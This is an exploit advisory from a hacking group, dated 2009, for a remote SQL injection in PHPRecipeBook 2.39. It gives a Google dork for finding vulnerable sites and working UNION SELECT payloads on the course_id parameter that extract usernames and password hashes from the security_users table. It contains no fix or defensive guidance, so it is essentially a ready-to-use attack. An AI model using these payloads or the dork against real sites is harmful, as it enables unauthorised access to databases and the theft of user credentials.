PHPRecipeBook 2.39 Remote SQL Injection Vulnerabilit
PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability
////////////////////////////1923TURK - GRUP///////////////////////////
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download :
[-] Bugs : Remote SQL injection Exploit
[-] Dork : inurl:"/index.php?m=" "PHPRecipeBook 2.39"
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[!] Note : Always use the time you have to finish your work.
Never leave it to the last minute.
Once time goes away, it never comes back
[-- Bugs --]
Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users--
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users--
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